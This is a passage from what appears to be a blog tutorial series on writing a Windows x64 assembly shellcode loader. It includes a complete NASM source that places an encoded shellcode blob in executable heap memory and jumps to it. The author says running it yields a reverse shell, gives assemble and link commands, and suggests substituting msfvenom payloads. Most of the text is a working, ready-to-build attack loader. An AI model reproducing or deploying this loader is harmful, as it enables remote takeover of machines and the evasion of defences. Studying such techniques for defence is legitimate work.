lea rsi, [rel encoded_shellcode]   ; this is the address of our shellcode.  we use relative addressing because of x64 conventions, also PIC friendly!
mov ecx, encoded_shellcode_total   ; this is the total size of our shellcode
mov r14, rdx                       ; move rdx into r14 to jump to it later and execute our shellcode once it's placed in the heap
xor rax, rax                       ; clear RAX
	
chunk_reader:                      ; a label 
    
mov al, byte [rsi]               ; moves a single byte from the address that holds our shellcode into al, which is the lowest 8 bits of RAX.  it goes -> RAX(64), EAX(32), AX(16), AL(8)
mov [rdx], al                    ; move this value into our heap address
inc rsi                          ; prepare to load the next byte in our reverse shell shellcode
test rcx, rcx                    ; check if rcx is zero
jz final                         ; jump to the final label if it is (and execute our shellcode)
inc rdx                          ; increase the position of our shellcode each time it's added to the heap
loop chunk_reader                ; keep looping until RCX is zero.  This also decrements RCX for us :)
    
final:
jmp r14                          ; jump to our shellcode!
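If the assembly loop is hard to follow, here is roughly the same copy written in C++, using harmless placeholder bytes of my own choosing. Treat it as a sketch of the idea and not a line-for-line translation: copy_bytes and copy_demo are names made up for this example, and unlike chunk_reader (which always copies at least one byte) this version checks the counter before copying, so a count of zero copies nothing.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Byte-by-byte copy: src plays the role of RSI, dst of RDX, remaining of RCX.
inline void copy_bytes(std::uint8_t* dst, const std::uint8_t* src, std::size_t remaining) {
    while (remaining != 0) {
        *dst = *src;   // mov al, byte [rsi] followed by mov [rdx], al
        ++src;         // inc rsi
        ++dst;         // inc rdx
        --remaining;   // the decrement that the loop instruction performs on RCX
    }
}

// Copies four placeholder bytes into a zero-filled destination and returns it.
inline std::vector<std::uint8_t> copy_demo() {
    const std::vector<std::uint8_t> source = { 0x01, 0x02, 0x03, 0x04 };
    std::vector<std::uint8_t> destination(source.size(), 0x00);  // zeroed, like HEAP_ZERO_MEMORY
    copy_bytes(destination.data(), source.data(), source.size());
    return destination;
}
```

The one thing the assembly does that this sketch leaves out is saving the original destination address (mov r14, rdx) before the loop advances RDX.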

And because I actually really do care that you understand this, I created a quick 5 minute video explaining it step by step using x64dbg 😸



The Final Code for Part 1

Okay, let’s bring it all together now. Here’s the full code for Part 1 of this series. Again, using externs for our API calls. In Part 2, be prepared! We’re going to manually locate the APIs 😸 no cheating using externs.

;nasm -fwin64 [x64findkernel32.asm]
;ld -m i386pep -N -o x64findkernel32.exe x64findkernel32.obj
; externs: ld -m i386pep -LC:\mingw64\x86_64-w64-mingw32\lib asmsock.obj -o asmsock.exe -lws2_32 -lkernel32

BITS 64

section .shellstuff rdata read
encoded_shellcode:
db 0x48, 0x8d, 0x35, 0x23, 0x00, 0x00, 0x00, 0x44, 0x8a, 0x0d, 0xb5, 0x01, 0x00, 0x00, 0xb9, 0xd0, 0x01, 0x00, 0x00, 0x8a, 0x06, 0x44, 0x30, 0xc8, 0xf6, 0xd0, 0x88, 0x06, 0x48, 0xff, 0xc6, 0xe2, 0xf2, 0x48, 0x8d, 0x05, 0x02, 0x00, 0x00, 0x00, 0xff, 0xe0, 0xaf, 0x1b, 0xd0, 0xb7, 0xa3, 0xbb, 0x93, 0x53, 0x53, 0x53, 0x12, 0x02, 0x12, 0x03, 0x01, 0x02, 0x05, 0x1b, 0x62, 0x81, 0x36, 0x1b, 0xd8, 0x01, 0x33, 0x1b, 0xd8, 0x01, 0x4b, 0x1b, 0xd8, 0x01, 0x73, 0x1b, 0xd8, 0x21, 0x03, 0x1b, 0x5c, 0xe4, 0x19, 0x19, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x6f, 0x32, 0x2f, 0x51, 0x7f, 0x73, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0xb1, 0xbe, 0x01, 0x12, 0x02, 0x1b, 0xd8, 0x01, 0x73, 0xd8, 0x11, 0x6f, 0x1b, 0x52, 0x83, 0xd8, 0xd3, 0xdb, 0x53, 0x53, 0x53, 0x1b, 0xd6, 0x93, 0x27, 0x34, 0x1b, 0x52, 0x83, 0x03, 0xd8, 0x1b, 0x4b, 0x17, 0xd8, 0x13, 0x73, 0x1a, 0x52, 0x83, 0xb0, 0x05, 0x1b, 0xac, 0x9a, 0x12, 0xd8, 0x67, 0xdb, 0x1b, 0x52, 0x85, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0x6b, 0xb3, 0x26, 0xa2, 0x1f, 0x50, 0x1f, 0x77, 0x5b, 0x16, 0x6a, 0x82, 0x26, 0x8b, 0x0b, 0x17, 0xd8, 0x13, 0x77, 0x1a, 0x52, 0x83, 0x35, 0x12, 0xd8, 0x5f, 0x1b, 0x17, 0xd8, 0x13, 0x4f, 0x1a, 0x52, 0x83, 0x12, 0xd8, 0x57, 0xdb, 0x1b, 0x52, 0x83, 0x12, 0x0b, 0x12, 0x0b, 0x0d, 0x0a, 0x09, 0x12, 0x0b, 0x12, 0x0a, 0x12, 0x09, 0x1b, 0xd0, 0xbf, 0x73, 0x12, 0x01, 0xac, 0xb3, 0x0b, 0x12, 0x0a, 0x09, 0x1b, 0xd8, 0x41, 0xba, 0x04, 0xac, 0xac, 0xac, 0x0e, 0x1a, 0xed, 0x24, 0x20, 0x61, 0x0c, 0x60, 0x61, 0x53, 0x53, 0x12, 0x05, 0x1a, 0xda, 0xb5, 0x1b, 0xd2, 0xbf, 0xf3, 0x52, 0x53, 0x53, 0x1a,0xda, 0xb6, 0x1a, 0xef, 0x51, 0x53, 0x70, 0x7a, 0x2c, 0x53, 0x53, 0x52, 0x12, 0x07, 0x1a, 0xda, 0xb7, 0x1f, 0xda, 0xa2, 0x12, 0xe9, 0x1f, 0x24, 0x75, 0x54, 0xac, 0x86, 0x1f, 0xda, 0xb9, 0x3b, 0x52, 0x52, 0x53, 0x53, 0x0a, 0x12, 0xe9, 0x7a, 0xd3, 0x38, 0x53, 0xac, 0x86, 0x03, 0x03, 0x1e, 0x62, 0x9a, 0x1e, 0x62, 0x93, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x91, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x92, 
0x12, 0xe9, 0xb9, 0x5c, 0x8c, 0xb3, 0xac, 0x86, 0x1b, 0xda, 0x94, 0x39, 0x43, 0x12, 0x0b, 0x1f, 0xda, 0xb1, 0x1b, 0xda, 0xaa, 0x12, 0xe9, 0xca, 0xf6, 0x27, 0x32, 0xac, 0x86, 0x1b, 0xd2, 0x97, 0x13, 0x51, 0x53, 0x53, 0x1a, 0xeb, 0x30, 0x3e, 0x37, 0x53, 0x53, 0x53, 0x53, 0x53, 0x12, 0x03, 0x12, 0x03, 0x1b, 0xda, 0xb1, 0x04, 0x04,0x04, 0x1e, 0x62, 0x93, 0x39, 0x5e, 0x0a, 0x12, 0x03, 0xb1, 0xaf, 0x35, 0x94, 0x17, 0x77, 0x07, 0x52, 0x52, 0x1b, 0xde, 0x17, 0x77, 0x4b, 0x95, 0x53, 0x3b, 0x1b, 0xda, 0xb5, 0x05, 0x03, 0x12, 0x03, 0x12, 0x03, 0x12, 0x03, 0x1a, 0xac, 0x93, 0x12, 0x03, 0x1a, 0xac, 0x9b, 0x1e, 0xda, 0x92, 0x1f, 0xda, 0x92, 0x12, 0xe9, 0x2a, 0x9f, 0x6c, 0xd5, 0xac, 0x86, 0x1b, 0x62, 0x81, 0x1b, 0xac, 0x99, 0xd8, 0x5d, 0x12, 0xe9, 0x5b, 0xd4, 0x4e, 0x33, 0xac, 0x86, 0xe8, 0xa3, 0xe6, 0xf1, 0x05, 0x12, 0xe9, 0xf5, 0xc6, 0xee, 0xce, 0xac, 0x86, 0x1b, 0xd0, 0x97, 0x7b, 0x6f, 0x55, 0x2f, 0x59, 0xd3, 0xa8, 0xb3, 0x26, 0x56, 0xe8, 0x14, 0x40, 0x21, 0x3c, 0x39, 0x53, 0x0a, 0x12, 0xda, 0x89, 0xac, 0x86, 0x53, 0x53, 0x53, 0x53
encoded_shellcode_total equ $ - encoded_shellcode

section .data 

section .text
global main

; both of these are conveniently in kernel32.dll ;)
extern HeapCreate
extern HeapAlloc

main:
sub rsp, 0x28
and rsp, 0xFFFFFFFFFFFFFFF0
	
xor  r8d,r8d  
xor  edx,edx  
mov  ecx, 0x40000  
call HeapCreate
sub rsp, 72
mov [rsp], rax
add rsp, 72
xor rcx, rcx
	
mov r8, encoded_shellcode_total ;size of shellcode
mov edx,8  
mov rcx,qword [rsp - 72]  
call HeapAlloc
push rax
pop rdx ; memory address of our heap allocation
	
lea rsi, [rel encoded_shellcode]
mov ecx, encoded_shellcode_total
mov r14, rdx ; save for later
xor rax, rax
	
chunk_reader:
    
mov al, byte [rsi]
mov [rdx], al
inc rsi
test rcx, rcx
jz final
inc rdx
loop chunk_reader
    
final:
jmp r14

For now, we have to build this into a PE executable to run it, as it’s not ready to be turned into standalone shellcode just yet. Soon though :) Here’s how you can accomplish that. I use the ld.exe linker on Windows. You can do this on Linux too if you like. You’ll want to download mingw64 first, of course. You can download the exact version of mingw64 I use here:

mingw64

The ld.exe linker executable will be located in the extracted bin subdirectory: C:\mingw64\bin

First assemble the source with nasm -fwin64, as shown in the comment at the top of the listing, to produce the .obj file. Then here’s the command to link it into an executable: ld.exe -m i386pep -LC:\mingw64\x86_64-w64-mingw32\lib -o mem_mapper_pic.exe mem_mapper_pic.obj -lkernel32

Run the resulting .exe and you should get your reverse shell on 127.0.0.1 port 9001. Feel free to change the shellcode if you like. I encoded mine, but you can also use msfvenom to insert your own custom shellcode too! Consider it a homework exercise 😺

Okay that’s a wrap for Part 1. Stay tuned for Part 2, and as always thanks for reading and I hope this was helpful and insightful.
